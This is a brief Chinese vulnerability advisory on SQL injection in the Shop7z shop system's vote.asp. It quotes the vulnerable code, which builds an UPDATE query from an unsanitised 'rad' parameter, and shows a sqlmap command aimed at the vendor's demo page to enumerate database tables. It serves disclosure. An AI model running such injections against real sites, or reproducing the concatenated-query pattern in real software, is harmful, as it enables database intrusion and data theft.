shop7z投票处post 注入

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: vote.asp ### 详细说明: vote.asp 14-22 ``` if rad<>"" and request.cookies("votestat")<>"Y" then sql="update e_diaocha2 set shuliang=shuliang+1 where id="&rad 'response.write sql 'response.end conn.execute(sql) votenews="1" response.cookies("votestat")="Y" end if %> ``` ### 漏洞证明: [<img src="https://images.seebug.org/upload/201409/1519415127679c71f7d8a8a3efad324a6598a348.jpg" alt="7.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/1519415127679c71f7d8a8a3efad324a6598a348.jpg) F:\sqlmap>python sqlmap.py -u "http://www.shop7z.com/demo/vote.asp" --data "rad= 1" --tables _ ___ ___| |_ ___ ___ {1.0-dev-nongit-20140915} |_ -| . | | | .'| . | |___|_ |_|_|_|_|__,| _| |_| |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not respon sible for any...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息